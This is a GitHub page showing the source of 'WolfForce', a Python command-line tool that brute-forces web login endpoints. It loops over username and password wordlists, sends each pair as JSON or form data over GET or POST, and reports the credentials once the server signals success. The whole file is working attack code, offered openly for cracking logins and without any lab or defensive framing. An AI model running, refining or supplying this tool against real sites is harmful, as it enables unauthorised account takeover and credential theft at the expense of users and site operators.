WolfForce/wolfforce.py at main · CodingChatRoom/WolfForce · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
import requests
import argparse
import time
import os
import sys
from termcolor import colored
import pyfiglet

def slowprint(text, delay=0.03):
    for c in text + '\n':
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(delay)

def show_banner():
    os.system('cls' if os.name == 'nt' else 'clear')
    banner = pyfiglet.figlet_format("WolfForce", font="slant")
    print(colored(banner, 'red'))
    print(colored("═══════════════════════════════════════════════════════════════", 'yellow'))
    print(colored(" 🧑‍💻  Author: MUHAMMAD SAQLAIN SHOUKAT", 'cyan'))
    print(colored(" 📺  Channel: CODING CHAT ROOM", 'cyan'))
    print(colored(" 🛠️   Tool: Brute Force Login (API, Form, JSON, GET/POST)", 'cyan'))
    print(colored("═══════════════════════════════════════════════════════════════", 'yellow'))

def show_intro():
    slowprint(colored("\n🔍 Initializing Engine...", "magenta"), 0.05)
    slowprint(colored("⚙️  Setting up attack modules...", "magenta"), 0.05)
    slowprint(colored("🚀 Ready to crack weak logins!\n", "green"), 0.05)

def load_wordlist(path, word_type):
    try:
        with open(path, 'r') as file:
            lines = file.read().splitlines()
            print(colored(f"✅ Loaded {len(lines)} {word_type}", "green"))
            return lines
    except Exception as e:
        print(colored(f"❌ Error loading {word_type} file: {e}", "red"))
        exit()

def interactive_mode():
    print(colored("🔧 Enter your wordlist file paths:", "blue"))
    users_path = input(colored("📄 Path to usernames.txt: ", "white"))
    passwords_path = input(colored("📄 Path to passwords.txt: ", "white"))
    return users_path, passwords_path

# Show banner and intro
show_banner()
show_intro()

# Argument parsing
parser = argparse.ArgumentParser(description="WolfForce | Brute Force Login Tool by Muhammad Saqlain Shoukat")
parser.add_argument('--url', required=True, help='Login URL (e.g. http://127.0.0.1/login or /api/login)')
parser.add_argument('--users', help='Path to usernames file (optional)')
parser.add_argument('--passwords', help='Path to passwords file (optional)')
parser.add_argument('--interactive', action='store_true', help='Enable interactive wordlist input')
parser.add_argument('--method', choices=['GET', 'POST'], default='POST', help='HTTP method to use')
parser.add_argument('--format', choices=['json', 'form'], default='json', help='Data format: JSON (API) or FORM (HTML/PHP)')
parser.add_argument('--userfield', default='email', help='Field name for username (default: email)')
parser.add_argument('--passfield', default='password', help='Field name for password (default: password)')
args = parser.parse_args()

# Wordlists
if args.interactive:
    users_path, passwords_path = interactive_mode()
else:
    users_path = args.users if args.users else "wordlists/usernames.txt"
    passwords_path = args.passwords if args.passwords else "wordlists/passwords.txt"

users = load_wordlist(users_path, "usernames")
passwords = load_wordlist(passwords_path, "passwords")

# Brute force
print(colored(f"\n🌐 Target: {args.url}", "yellow"))
print(colored(f"📤 Method: {args.method} | Format: {args.format}", "yellow"))
print(colored(f"🔓 Starting brute-force...\n", "green"))

attempt = 0
for user in users:
    for pwd in passwords:
        attempt += 1
        try:
            start = time.time()

            payload = {
                args.userfield: user,
                args.passfield: pwd
            }

            if args.format == "json":
                response = requests.request(args.method, args.url, json=payload, timeout=5)
            else:
                response = requests.request(args.method, args.url, data=payload, timeout=5)

            duration = time.time() - start

            try:
                data = response.json()
                msg = data.get('message', 'No message')
                print(colored(f"[{attempt}] {user}:{pwd} => {msg} (⏱️ {duration:.2f}s)", "white"))

                if data.get('success'):
                    print(colored(f"\n✅ SUCCESS! Login cracked!", "green"))
                    print(colored(f"🧑‍💻 Credentials: {user}:{pwd}", "cyan"))
                    print(colored("💀 Exiting WolfForce...\n", "magenta"))
                    exit()
            except:
                print(colored(f"[{attempt}] {user}:{pwd} => HTTP {response.status_code} (non-JSON)", "white"))
                if "success" in response.text.lower():
                    print(colored(f"\n⚠️ Valid Cradentials: {user}:{pwd}", "green"))
                    print(colored("💀 Exiting WolfForce...\n", "magenta"))
                    exit()

        except Exception as e:
            print(colored(f"[{attempt}] ❌ Error: {e}", "red"))

print(colored("\n🚫 Brute force complete. No valid credentials found.", "red"))